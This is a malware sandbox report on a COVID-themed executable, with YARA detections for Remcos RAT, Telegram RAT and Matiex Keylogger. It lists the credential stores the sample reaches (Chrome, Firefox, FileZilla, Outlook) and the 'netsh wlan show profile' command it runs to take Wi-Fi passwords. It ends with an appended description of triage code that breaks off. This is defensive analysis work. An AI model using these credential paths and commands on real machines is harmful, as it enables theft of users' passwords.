Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Users\user\AppData\Local\Temp\dwnl.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00402832 Sleep,GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_00402832
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040E549 GetComputerNameExW,GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 28_2_0040E549

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile

Stealing of Sensitive Information:

Yara detected Matiex Keylogger
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2fcf496.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2faeb92.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.492777549.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464230298.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424995684.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432421502.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464012145.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429908152.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwnl.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR
Yara detected Remcos RAT
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429721772.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432136781.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Contains functionality to steal Firefox passwords or cookies
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 28_2_004057B6
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: \key3.db 28_2_004057B6
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 28_2_00405622
Yara detected Credential Stealer
Source: Yara match File source: 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR
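Triage logic for the credential-harvesting behaviour recorded in this section and under the netsh signature above, as an added example rather than code from the report or from the sample. It takes constructed process-creation, file-open and registry-open records shaped like the report's "Process created", "File opened" and "Key opened" lines, flags access to a browser, mail or FTP credential store by any process other than the application that owns it, and rates `netsh wlan show profile` as medium on its own (it only enumerates saved SSIDs) and high when `key=clear` is present (which dumps the stored passphrase). The event field names, the owner allow-list, the Firefox profile directory name and the `key=clear` event are assumptions; the report itself shows only `netsh wlan show profile` and the legacy Firefox `key3.db`.

```python
"""Triage sandbox telemetry for credential-harvesting behaviour.

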